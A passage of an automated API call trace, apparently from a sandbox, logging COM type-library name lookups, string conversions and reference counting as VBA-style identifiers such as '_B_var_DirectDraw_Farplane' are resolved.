IUnknown:Release (This=0x731cc80) returned 0x12 [0033.221] IUnknown:AddRef (This=0x7829f50) returned 0x8 [0033.221] ITypeLib:RemoteIsName (in: This=0x7829f50, szNameBuf="MeY", lHashVal=0x10b359, pfName=0x2e4720, pBstrLibName=0x2e4650 | out: pfName=0x2e4720*=0, pBstrLibName=0x2e4650) returned 0x0 [0033.221] IUnknown:Release (This=0x7829f50) returned 0x7 [0033.221] IMalloc:Alloc (This=0x7fefe015380, cb=0xb) returned 0xb4963f0 [0033.222] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_MeY") returned 0x10706a [0033.222] strcpy_s (in: _Dst=0x2e49b0, _DstSize=0xb, _Src="_B_var_MeY" | out: _Dst="_B_var_MeY") returned 0x0 [0033.222] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e49b0, cbMultiByte=11, lpWideCharStr=0x2e4800, cchWideChar=11 | out: lpWideCharStr="_B_var_MeY") returned 11 [0033.222] IUnknown:AddRef (This=0x782a220) returned 0xf [0033.222] ITypeLib:RemoteIsName (in: This=0x782a220, szNameBuf="_B_var_MeY", lHashVal=0x10706a, pfName=0x2e48d0, pBstrLibName=0x2e4800 | out: pfName=0x2e48d0*=0, pBstrLibName=0x2e4800) returned 0x0 [0033.222] IUnknown:Release (This=0x782a220) returned 0xe [0033.222] IUnknown:AddRef (This=0x731da90) returned 0x16 [0033.222] ITypeLib:RemoteIsName (in: This=0x731da90, szNameBuf="_B_var_MeY", lHashVal=0x10706a, pfName=0x2e48d0, pBstrLibName=0x2e4800 | out: pfName=0x2e48d0*=0, pBstrLibName=0x2e4800) returned 0x0 [0033.222] IUnknown:Release (This=0x731da90) returned 0x15 [0033.222] IUnknown:AddRef (This=0x731cc80) returned 0x13 [0033.222] ITypeLib:RemoteIsName (in: This=0x731cc80, szNameBuf="_B_var_MeY", lHashVal=0x10706a, pfName=0x2e48d0, pBstrLibName=0x2e4800 | out: pfName=0x2e48d0*=0, pBstrLibName=0x2e4800) returned 0x0 [0033.222] IUnknown:Release (This=0x731cc80) returned 0x12 [0033.222] IUnknown:AddRef (This=0x7829f50) returned 0x8 [0033.222] ITypeLib:RemoteIsName (in: This=0x7829f50, szNameBuf="_B_var_MeY", lHashVal=0x10706a, pfName=0x2e48d0, pBstrLibName=0x2e4800 | out: pfName=0x2e48d0*=0, pBstrLibName=0x2e4800) returned 0x0 [0033.222] IUnknown:Release (This=0x7829f50) returned 0x7 [0033.222] IUnknown:AddRef (This=0x782b300) returned 0x7 [0033.222] ITypeLib:RemoteIsName (in: This=0x782b300, szNameBuf="_B_var_MeY", lHashVal=0x10706a, pfName=0x2e48d0, pBstrLibName=0x2e4800 | out: pfName=0x2e48d0*=0, pBstrLibName=0x2e4800) returned 0x0 [0033.222] IUnknown:Release (This=0x782b300) returned 0x6 [0033.222] IUnknown:AddRef (This=0x782a220) returned 0xf [0033.222] IUnknown:Release (This=0x782a220) returned 0xe [0033.222] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a526ba, cbMultiByte=8, lpWideCharStr=0x2e46c0, cchWideChar=7 | out: lpWideCharStr="Status") returned 0 [0033.222] wcscpy_s (in: _Destination=0xb5c7ed8, _SizeInWords=0x7, _Source="Status" | out: _Destination="Status") returned 0x0 [0033.222] ITypeInfo:LocalReleaseVarDesc (This=0x784cfa0) returned 0x0 [0033.222] IUnknown:QueryInterface (in: This=0x784cfa0, riid=0x7fee3a76b40*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2e4910 | out: ppvObject=0x2e4910*=0x0) returned 0x80004002 [0033.222] IUnknown:QueryInterface (in: This=0x784cfa0, riid=0x7fee3a76b40*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2e48e0 | out: ppvObject=0x2e48e0*=0x0) returned 0x80004002 [0033.222] IUnknown:QueryInterface (in: This=0x784cfa0, riid=0x7fee3a7add8*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2e48d0 | out: ppvObject=0x2e48d0*=0x0) returned 0x80004002 [0033.222] IUnknown:QueryInterface (in: This=0x784cfa0, riid=0x7fee3a7ade8*(Data1=0xcacc1e88, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2e48d8 | out: ppvObject=0x2e48d8*=0x0) returned 0x80004002 [0033.222] ITypeInfo:RemoteGetTypeAttr (in: This=0x784cfa0, ppTypeAttr=0x2e4908, pDummy=0x10 | out: ppTypeAttr=0x2e4908, pDummy=0x10) returned 0x0 [0033.222] ITypeInfo:LocalReleaseTypeAttr (This=0x784cfa0) returned 0x0 [0033.222] IUnknown:AddRef (This=0x784cfa0) returned 0x3 [0033.222] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xb52dd86, cbMultiByte=1, lpWideCharStr=0x9d10294, cchWideChar=4 | out: lpWideCharStr="G") returned 1 [0033.222] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xb52dd8c, cbMultiByte=3, lpWideCharStr=0x9d102fc, cchWideChar=8 | out: lpWideCharStr="Dro") returned 3 [0033.222] ITypeInfo:GetRefTypeInfo (in: This=0x784cff8, hreftype=0xa80, ppTInfo=0x2e4358 | out: ppTInfo=0x2e4358*=0x784d050) returned 0x0 [0033.223] IUnknown:QueryInterface (in: This=0x784d050, riid=0x7fee3a7ade8*(Data1=0xcacc1e88, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2e4528 | out: ppvObject=0x2e4528*=0x0) returned 0x80004002 [0033.223] ITypeInfo:RemoteGetTypeAttr (in: This=0x784d050, ppTypeAttr=0x2e43a8, pDummy=0x10 | out: ppTypeAttr=0x2e43a8, pDummy=0x10) returned 0x0 [0033.223] ITypeInfo:LocalReleaseTypeAttr (This=0x784d050) returned 0x0 [0033.223] IUnknown:QueryInterface (in: This=0x784d050, riid=0x7fee3a76b40*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2e40b0 | out: ppvObject=0x2e40b0*=0x0) returned 0x80004002 [0033.223] IUnknown:QueryInterface (in: This=0x784d050, riid=0x7fee3a7add8*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2e40a0 | out: ppvObject=0x2e40a0*=0x0) returned 0x80004002 [0033.223] IUnknown:QueryInterface (in: This=0x784d050, riid=0x7fee3a7ade8*(Data1=0xcacc1e88, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2e40a8 | out: ppvObject=0x2e40a8*=0x0) returned 0x80004002 [0033.223] ITypeInfo:RemoteGetTypeAttr (in: This=0x784d050, ppTypeAttr=0x2e40d8, pDummy=0x10 | out: ppTypeAttr=0x2e40d8, pDummy=0x10) returned 0x0 [0033.223] ITypeInfo:LocalReleaseTypeAttr (This=0x784d050) returned 0x0 [0033.223] IUnknown:AddRef (This=0x784d050) returned 0x2 [0033.223] IUnknown:QueryInterface (in: This=0x784d050, riid=0x7fee3a7add8*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2e4250 | out: ppvObject=0x2e4250*=0x0) returned 0x80004002 [0033.223] IUnknown:QueryInterface (in: This=0x784d050, riid=0x7fee3a7ade8*(Data1=0xcacc1e88, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2e4248 | out: ppvObject=0x2e4248*=0x0) returned 0x80004002 [0033.223] IUnknown:Release (This=0x784d050) returned 0x1 [0033.223] IUnknown:AddRef (This=0x784d050) returned 0x2 [0033.223] IUnknown:QueryInterface (in: This=0x784cff8, riid=0x7fee3a76b40*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2e4910 | out: ppvObject=0x2e4910*=0x0) returned 0x80004002 [0033.223] IUnknown:QueryInterface (in: This=0x784cff8, riid=0x7fee3a76b40*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2e48e0 | out: ppvObject=0x2e48e0*=0x0) returned 0x80004002 [0033.223] IUnknown:QueryInterface (in: This=0x784cff8, riid=0x7fee3a7add8*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2e48d0 | out: ppvObject=0x2e48d0*=0x0) returned 0x80004002 [0033.223] IUnknown:QueryInterface (in: This=0x784cff8, riid=0x7fee3a7ade8*(Data1=0xcacc1e88, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2e48d8 | out: ppvObject=0x2e48d8*=0x0) returned 0x80004002 [0033.223] ITypeInfo:RemoteGetTypeAttr (in: This=0x784cff8, ppTypeAttr=0x2e4908, pDummy=0x10 | out: ppTypeAttr=0x2e4908, pDummy=0x10) returned 0x0 [0033.223] ITypeInfo:LocalReleaseTypeAttr (This=0x784cff8) returned 0x0 [0033.223] IUnknown:AddRef (This=0x784cff8) returned 0x3 [0033.223] IMalloc:Free (This=0x7fefe015380, pv=0x78463a0) [0033.223] IMalloc:Alloc (This=0x7fefe015380, cb=0x38) returned 0x75dc6f0 [0033.224] IUnknown:Release (This=0x784d050) returned 0x1 [0033.224] IUnknown:QueryInterface (in: This=0x784d100, riid=0x7fee3a76b40*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2e47f0 | out: ppvObject=0x2e47f0*=0x0) returned 0x80004002 [0033.224] IUnknown:QueryInterface (in: This=0x784d100, riid=0x7fee3a76b40*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2e47c0 | out: ppvObject=0x2e47c0*=0x0) returned 0x80004002 [0033.224] IUnknown:QueryInterface (in: This=0x784d100, riid=0x7fee3a7add8*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2e47b0 | out: ppvObject=0x2e47b0*=0x0) returned 0x80004002 [0033.224] IUnknown:QueryInterface (in: This=0x784d100, riid=0x7fee3a7ade8*(Data1=0xcacc1e88, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2e47b8 | out: ppvObject=0x2e47b8*=0x0) returned 0x80004002 [0033.224] ITypeInfo:RemoteGetTypeAttr (in: This=0x784d100, ppTypeAttr=0x2e47e8, pDummy=0x10 | out: ppTypeAttr=0x2e47e8, pDummy=0x10) returned 0x0 [0033.224] ITypeInfo:LocalReleaseTypeAttr (This=0x784d100) returned 0x0 [0033.224] IUnknown:AddRef (This=0x784d100) returned 0x4 [0033.224] ITypeInfo:RemoteGetTypeAttr (in: This=0x784d100, ppTypeAttr=0x2e4c28, pDummy=0x9d10cb4 | out: ppTypeAttr=0x2e4c28, pDummy=0x9d10cb4*=0x0) returned 0x0 [0033.224] ITypeInfo:LocalReleaseTypeAttr (This=0x784d100) returned 0x0 [0033.224] IUnknown:Release (This=0x784d100) returned 0x3 [0033.224] IMalloc:Free (This=0x7fefe015380, pv=0x78463a0) [0033.224] ITypeInfo:RemoteGetTypeAttr (in: This=0x784d100, ppTypeAttr=0x2e41c0, pDummy=0x0 | out: ppTypeAttr=0x2e41c0, pDummy=0x0) returned 0x0 [0033.224] ITypeInfo:LocalReleaseTypeAttr (This=0x784d100) returned 0x0 [0033.224] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="rD") returned 0x105ef3 [0033.224] strcpy_s (in: _Dst=0x2e4800, _DstSize=0x3, _Src="rD" | out: _Dst="rD") returned 0x0 [0033.224] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e4800, cbMultiByte=3, lpWideCharStr=0x2e4650, cchWideChar=3 | out: lpWideCharStr="rD") returned 3 [0033.224] IUnknown:AddRef (This=0x782a220) returned 0x17 [0033.224] ITypeLib:RemoteIsName (in: This=0x782a220, szNameBuf="rD", lHashVal=0x105ef3, pfName=0x2e4720, pBstrLibName=0x2e4650 | out: pfName=0x2e4720*=0, pBstrLibName=0x2e4650*="@") returned 0x0 [0033.224] IUnknown:Release (This=0x782a220) returned 0x16 [0033.224] IUnknown:AddRef (This=0x731da90) returned 0x16 [0033.224] ITypeLib:RemoteIsName (in: This=0x731da90, szNameBuf="rD", lHashVal=0x105ef3, pfName=0x2e4720, pBstrLibName=0x2e4650 | out: pfName=0x2e4720*=0, pBstrLibName=0x2e4650*="@") returned 0x0 [0033.224] IUnknown:Release (This=0x731da90) returned 0x15 [0033.224] IUnknown:AddRef (This=0x731cc80) returned 0x13 [0033.224] ITypeLib:RemoteIsName (in: This=0x731cc80, szNameBuf="rD", lHashVal=0x105ef3, pfName=0x2e4720, pBstrLibName=0x2e4650 | out: pfName=0x2e4720*=0, pBstrLibName=0x2e4650*="@") returned 0x0 [0033.224] IUnknown:Release (This=0x731cc80) returned 0x12 [0033.224] IUnknown:AddRef (This=0x7829f50) returned 0x8 [0033.224] ITypeLib:RemoteIsName (in: This=0x7829f50, szNameBuf="rD", lHashVal=0x105ef3, pfName=0x2e4720, pBstrLibName=0x2e4650 | out: pfName=0x2e4720*=0, pBstrLibName=0x2e4650*="@") returned 0x0 [0033.224] IUnknown:Release (This=0x7829f50) returned 0x7 [0033.225] IMalloc:Alloc (This=0x7fefe015380, cb=0xa) returned 0xb4963f0 [0033.225] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_rD") returned 0x10f39b [0033.225] strcpy_s (in: _Dst=0x2e49b0, _DstSize=0xa, _Src="_B_var_rD" | out: _Dst="_B_var_rD") returned 0x0 [0033.225] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e49b0, cbMultiByte=10, lpWideCharStr=0x2e4800, cchWideChar=10 | out: lpWideCharStr="_B_var_rD") returned 10 [0033.225] IUnknown:AddRef (This=0x782a220) returned 0x17 [0033.225] ITypeLib:RemoteIsName (in: This=0x782a220, szNameBuf="_B_var_rD", lHashVal=0x10f39b, pfName=0x2e48d0, pBstrLibName=0x2e4800 | out: pfName=0x2e48d0*=0, pBstrLibName=0x2e4800) returned 0x0 [0033.225] IUnknown:Release (This=0x782a220) returned 0x16 [0033.225] IUnknown:AddRef (This=0x731da90) returned 0x16 [0033.225] ITypeLib:RemoteIsName (in: This=0x731da90, szNameBuf="_B_var_rD", lHashVal=0x10f39b, pfName=0x2e48d0, pBstrLibName=0x2e4800 | out: pfName=0x2e48d0*=0, pBstrLibName=0x2e4800) returned 0x0 [0033.225] IUnknown:Release (This=0x731da90) returned 0x15 [0033.225] IUnknown:AddRef (This=0x731cc80) returned 0x13 [0033.225] ITypeLib:RemoteIsName (in: This=0x731cc80, szNameBuf="_B_var_rD", lHashVal=0x10f39b, pfName=0x2e48d0, pBstrLibName=0x2e4800 | out: pfName=0x2e48d0*=0, pBstrLibName=0x2e4800) returned 0x0 [0033.225] IUnknown:Release (This=0x731cc80) returned 0x12 [0033.225] IUnknown:AddRef (This=0x7829f50) returned 0x8 [0033.225] ITypeLib:RemoteIsName (in: This=0x7829f50, szNameBuf="_B_var_rD", lHashVal=0x10f39b, pfName=0x2e48d0, pBstrLibName=0x2e4800 | out: pfName=0x2e48d0*=0, pBstrLibName=0x2e4800) returned 0x0 [0033.225] IUnknown:Release (This=0x7829f50) returned 0x7 [0033.225] IUnknown:AddRef (This=0x782b300) returned 0x7 [0033.225] ITypeLib:RemoteIsName (in: This=0x782b300, szNameBuf="_B_var_rD", lHashVal=0x10f39b, pfName=0x2e48d0, pBstrLibName=0x2e4800 | out: pfName=0x2e48d0*=0, pBstrLibName=0x2e4800) returned 0x0 [0033.225] IUnknown:Release (This=0x782b300) returned 0x6 [0033.225] IUnknown:AddRef (This=0x782a220) returned 0x17 [0033.225] IUnknown:Release (This=0x782a220) returned 0x16 [0033.225] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a517e2, cbMultiByte=3, lpWideCharStr=0x2e46c0, cchWideChar=2 | out: lpWideCharStr="D") returned 0 [0033.225] wcscpy_s (in: _Destination=0xb5c8158, _SizeInWords=0x2, _Source="D" | out: _Destination="D") returned 0x0 [0033.225] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a527b2, cbMultiByte=4, lpWideCharStr=0x2e46c0, cchWideChar=3 | out: lpWideCharStr="hh") returned 0 [0033.225] wcscpy_s (in: _Destination=0xb5c8168, _SizeInWords=0x3, _Source="hh" | out: _Destination="hh") returned 0x0 [0033.225] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x68210ee, cbMultiByte=6, lpWideCharStr=0x2e46c0, cchWideChar=5 | out: lpWideCharStr="Left") returned 0 [0033.225] wcscpy_s (in: _Destination=0xb5c8178, _SizeInWords=0x5, _Source="Left" | out: _Destination="Left") returned 0x0 [0033.225] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a5093e, cbMultiByte=5, lpWideCharStr=0x2e46c0, cchWideChar=4 | out: lpWideCharStr="Top") returned 0 [0033.225] wcscpy_s (in: _Destination=0xb5c8190, _SizeInWords=0x4, _Source="Top" | out: _Destination="Top") returned 0x0 [0033.225] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6822f6a, cbMultiByte=7, lpWideCharStr=0x2e46c0, cchWideChar=6 | out: lpWideCharStr="Right") returned 0 [0033.225] wcscpy_s (in: _Destination=0xb5c81a0, _SizeInWords=0x6, _Source="Right" | out: _Destination="Right") returned 0x0 [0033.225] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a5098e, cbMultiByte=8, lpWideCharStr=0x2e46c0, cchWideChar=7 | out: lpWideCharStr="Bottom") returned 0 [0033.225] wcscpy_s (in: _Destination=0xb5c81b8, _SizeInWords=0x7, _Source="Bottom" | out: _Destination="Bottom") returned 0x0 [0033.225] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="DirectDraw_Farplane") returned 0x105039 [0033.225] strcpy_s (in: _Dst=0x2e4800, _DstSize=0x14, _Src="DirectDraw_Farplane" | out: _Dst="DirectDraw_Farplane") returned 0x0 [0033.225] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e4800, cbMultiByte=20, lpWideCharStr=0x2e4650, cchWideChar=20 | out: lpWideCharStr="DirectDraw_Farplane") returned 20 [0033.225] IUnknown:AddRef (This=0x782a220) returned 0x17 [0033.225] ITypeLib:RemoteIsName (in: This=0x782a220, szNameBuf="DirectDraw_Farplane", lHashVal=0x105039, pfName=0x2e4720, pBstrLibName=0x2e4650 | out: pfName=0x2e4720*=0, pBstrLibName=0x2e4650) returned 0x0 [0033.225] IUnknown:Release (This=0x782a220) returned 0x16 [0033.225] IUnknown:AddRef (This=0x731da90) returned 0x16 [0033.225] ITypeLib:RemoteIsName (in: This=0x731da90, szNameBuf="DirectDraw_Farplane", lHashVal=0x105039, pfName=0x2e4720, pBstrLibName=0x2e4650 | out: pfName=0x2e4720*=0, pBstrLibName=0x2e4650) returned 0x0 [0033.225] IUnknown:Release (This=0x731da90) returned 0x15 [0033.225] IUnknown:AddRef (This=0x731cc80) returned 0x13 [0033.226] ITypeLib:RemoteIsName (in: This=0x731cc80, szNameBuf="DirectDraw_Farplane", lHashVal=0x105039, pfName=0x2e4720, pBstrLibName=0x2e4650 | out: pfName=0x2e4720*=0, pBstrLibName=0x2e4650) returned 0x0 [0033.226] IUnknown:Release (This=0x731cc80) returned 0x12 [0033.226] IUnknown:AddRef (This=0x7829f50) returned 0x8 [0033.226] ITypeLib:RemoteIsName (in: This=0x7829f50, szNameBuf="DirectDraw_Farplane", lHashVal=0x105039, pfName=0x2e4720, pBstrLibName=0x2e4650 | out: pfName=0x2e4720*=0, pBstrLibName=0x2e4650) returned 0x0 [0033.226] IUnknown:Release (This=0x7829f50) returned 0x7 [0033.226] IMalloc:Alloc (This=0x7fefe015380, cb=0x1b) returned 0xb5cff90 [0033.226] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_DirectDraw_Farplane") returned 0x10d6eb [0033.226] strcpy_s (in: _Dst=0x2e49b0, _DstSize=0x1b, _Src="_B_var_DirectDraw_Farplane" | out: _Dst="_B_var_DirectDraw_Farplane") returned 0x0 [0033.226] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e49b0, cbMultiByte=27, lpWideCharStr=0x2e4800, cchWideChar=27 | out: lpWideCharStr="_B_var_DirectDraw_Farplane") returned 27 [0033.226] IUnknown:AddRef (This=0x782a220) returned 0x17 [0033.226] ITypeLib:RemoteIsName (in: This=0x782a220, szNameBuf="_B_var_DirectDraw_Farplane", lHashVal=0x10d6eb, pfName=0x2e48d0, pBstrLibName=0x2e4800 | out: pfName=0x2e48d0*=0, pBstrLibName=0x2e4800) returned 0x0 [0033.226] IUnknown:Release (This=0x782a220) returned 0x16 [0033.226] IUnknown:AddRef (This=0x731da90) returned 0x16 [0033.226] ITypeLib:RemoteIsName (in: This=0x731da90, szNameBuf="_B_var_DirectDraw_Farplane", lHashVal=0x10d6eb, pfName=0x2e48d0, pBstrLibName=0x2e4800 | out: pfName=0x2e48d0*=0, pBstrLibName=0x2e4800) returned 0x0 [0033.226] IUnknown:Release (This=0x731da90) returned 0x15 [0033.226] IUnknown:AddRef (This=0x731cc80) returned 0x13 [0033.226] ITypeLib:RemoteIsName (in: This=0x731cc80, szNameBuf="_B_var_DirectDraw_Farplane", lHashVal=0x10d6eb, pfName=0x2e48d0, pBstrLibName=0x2e4800 | out: pfName=0x2e48d0*=0, pBstrLibName=0x2e4800) returned 0x0 [0033.226] IUnknown:Release (This=0x731cc80) returned 0x12 [0033.226] IUnknown:AddRef (This=0x7829f50) returned 0x8 [0033.226] ITypeLib:RemoteIsName (in: This=0x7829f50, szNameBuf="_B_var_DirectDraw_Farplane", lHashVal=0x10d6eb, pfName=0x2e48d0, pBstrLibName=0x2e4800 | out: pfName=0x2e48d0*=0, pBstrLibName=0x2e4800) returned 0x0 [0033.226] IUnknown:Release (This=0x7829f50) returned 0x7 [0033.226] IUnknown:AddRef (This=0x782b300) returned 0x7 [0033.226] ITypeLib:RemoteIsName (in: This=0x782b300, szNameBuf="_B_var_DirectDraw_Farplane", lHashVal=0x10d6eb, pfName=0x2e48d0, pBstrLibName=0x2e4800 | out: pfName=0x2e48d0*=0, pBstrLibName=0x2e4800) returned 0x0 [0033.226] IUnknown:Release (This=0x782b300) returned 0x6 [0033.226] IUnknown:AddRef (This=0x782a220) returned 0x17 [0033.226] IUnknown:Release (This=0x782a220) returned 0x16 [0033.226] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="DDBLTFAST_WAIT") returned 0x108122 [0033.226] strcpy_s (in: _Dst=0x2e4800, _DstSize=0xf, _Src="DDBLTFAST_WAIT" | out: _Dst="DDBLTFAST_WAIT") returned 0x0 [0033.226] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e4800, cbMultiByte=15, lpWideCharStr=0x2e4650, cchWideChar=15 | out: lpWideCharStr="DDBLTFAST_WAIT") returned 15 [0033.226] IUnknown:AddRef (This=0x782a220) returned 0x17 [0033.226] ITypeLib:RemoteIsName (in: This=0x782a220, szNameBuf="DDBLTFAST_WAIT", lHashVal=0x108122, pfName=0x2e4720, pBstrLibName=0x2e4650 | out: pfName=0x2e4720*=0, pBstrLibName=0x2e4650) returned 0x0 [0033.226] IUnknown:Release (This=0x782a220) returned 0x16 [0033.226] IUnknown:AddRef (This=0x731da90) returned 0x16 [0033.226] ITypeLib:RemoteIsName (in: This=0x731da90, szNameBuf="DDBLTFAST_WAIT", lHashVal=0x108122, pfName=0x2e4720, pBstrLibName=0x2e4650 | out: pfName=0x2e4720*=0, pBstrLibName=0x2e4650) returned 0x0 [0033.226] IUnknown:Release (This=0x731da90) returned 0x15 [0033.226] IUnknown:AddRef (This=0x731cc80) returned 0x13 [0033.226] ITypeLib:RemoteIsName (in: This=0x731cc80, szNameBuf="DDBLTFAST_WAIT", lHashVal=0x108122, pfName=0x2e4720, pBstrLibName=0x2e4650 | out: pfName=0x2e4720*=0, pBstrLibName=0x2e4650) returned 0x0 [0033.226] IUnknown:Release (This=0x731cc80) returned 0x12 [0033.226] IUnknown:AddRef (This=0x7829f50) returned 0x8 [0033.226] ITypeLib:RemoteIsName (in: This=0x7829f50, szNameBuf="DDBLTFAST_WAIT", lHashVal=0x108122, pfName=0x2e4720, pBstrLibName=0x2e4650 | out: pfName=0x2e4720*=0, pBstrLibName=0x2e4650) returned 0x0 [0033.226] IUnknown:Release (This=0x7829f50) returned 0x7 [0033.226] IMalloc:Alloc (This=0x7fefe015380, cb=0x16) returned 0xb4963f0 [0033.226] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_DDBLTFAST_WAIT") returned 0x1027f3 [0033.226] strcpy_s (in: _Dst=0x2e49b0, _DstSize=0x16, _Src="_B_var_DDBLTFAST_WAIT" | out: _Dst="_B_var_DDBLTFAST_WAIT") returned 0x0 [0033.227] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e49b0, cbMultiByte=22, lpWideCharStr=0x2e4800, cchWideChar=22 | out: lpWideCharStr="_B_var_DDBLTFAST_WAIT") returned 22 [0033.227] IUnknown:AddRef (This=0x782a220) returned 0x17 [0033.227] ITypeLib:RemoteIsName (in: This=0x782a220, szNameBuf="_B_var_DDBLTFAST_WAIT", lHashVal=0x1027f3, pfName=0x2e48d0, pBstrLibName=0x2e4800 | out: pfName=0x2e48d0*=0, pBstrLibName=0x2e4800) returned 0x0 [0033.227] IUnknown:Release (This=0x782a220) returned 0x16 [0033.227] IUnknown:AddRef (This=0x731da90) returned 0x16 [0033.227] ITypeLib:RemoteIsName (in: This=0x731da90, szNameBuf="_B_var_DDBLTFAST_WAIT", lHashVal=0x1027f3, pfName=0x2e48d0, pBstrLibName=0x2e4800 | out: pfName=0x2e48d0*=0, pBstrLibName=0x2e4800) returned 0x0 [0033.227] IUnknown:Release (This=0x731da90) returned 0x15 [0033.227] IUnknown:AddRef (This=0x731cc80) returned 0x13 [0033.227] ITypeLib:RemoteIsName (in: This=0x731cc80, szNameBuf="_B_var_DDBLTFAST_WAIT", lHashVal=0x1027f3, pfName=0x2e48d0, pBstrLibName=0x2e4800 | out: pfName=0x2e48d0*=0, pBstrLibName=0x2e4800) returned 0x0 [0033.227] IUnknown:Release (This=0x731cc80) returned 0x12 [0033.227] IUnknown:AddRef (This=0x7829f50) returned 0x8 [0033.227] ITypeLib:RemoteIsName (in: This=0x7829f50, szNameBuf="_B_var_DDBLTFAST_WAIT", lHashVal=0x1027f3, pfName=0x2e48d0, pBstrLibName=0x2e4800 | out: pfName=0x2e48d0*=0, pBstrLibName=0x2e4800) returned 0x0 [0033.227] IUnknown:Release (This=0x7829f50) returned 0x7 [0033.227] IUnknown:AddRef (This=0x782b300) returned 0x7 [0033.227] ITypeLib:RemoteIsName (in: This=0x782b300, szNameBuf="_B_var_DDBLTFAST_WAIT", lHashVal=0x1027f3, pfName=0x2e48d0, pBstrLibName=0x2e4800 | out: pfName=0x2e48d0*=0, pBstrLibName=0x2e4800) returned 0x0 